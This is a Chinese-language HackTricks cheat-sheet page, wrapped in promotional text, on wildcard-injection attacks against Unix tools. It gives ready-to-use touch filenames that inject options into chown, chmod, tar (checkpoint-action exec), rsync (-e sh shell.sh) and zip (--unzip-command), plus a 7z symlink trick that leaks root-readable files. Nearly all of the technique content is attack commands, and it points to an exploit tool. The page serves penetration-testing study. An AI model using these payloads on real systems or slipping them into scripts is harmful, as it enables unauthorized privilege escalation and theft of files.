4.5 KiB
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
其他支持HackTricks的方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 发现PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
chown, chmod
您可以指定要为其余文件复制的文件所有者和权限
touch "--reference=/my/own/path/filename"
您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(combined attack)_来利用此漏洞
更多信息请参考https://www.exploit-db.com/papers/33930
Tar
执行任意命令:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(tar attack)_来利用此漏洞
更多信息请参考https://www.exploit-db.com/papers/33930
Rsync
执行任意命令:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
你可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync攻击) 来利用这个漏洞。
更多信息请参考https://www.exploit-db.com/papers/33930
7z
在7z中,即使在*
之前使用--
(请注意--
表示以下输入不能被视为参数,因此在这种情况下只能是文件路径),你也可以造成任意错误以读取文件,因此如果类似以下命令正在以root权限执行:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
并且您可以在执行此操作的文件夹中创建文件,您可以创建文件@root.txt
和文件root.txt
作为符号链接指向您想要读取的文件:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
然后,当执行7z时,它会将root.txt
视为包含应压缩的文件列表的文件(这就是@root.txt
存在的意义),当7z读取root.txt
时,它将读取/file/you/want/to/read
,由于此文件的内容不是文件列表,它将抛出错误并显示内容。
更多信息请参阅HackTheBox的CTF比赛中的Write-ups。
Zip
执行任意命令:
zip name.zip files -T --unzip-command "sh -c whoami"
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
其他支持HackTricks的方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群组 或 电报群组 或 关注我的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。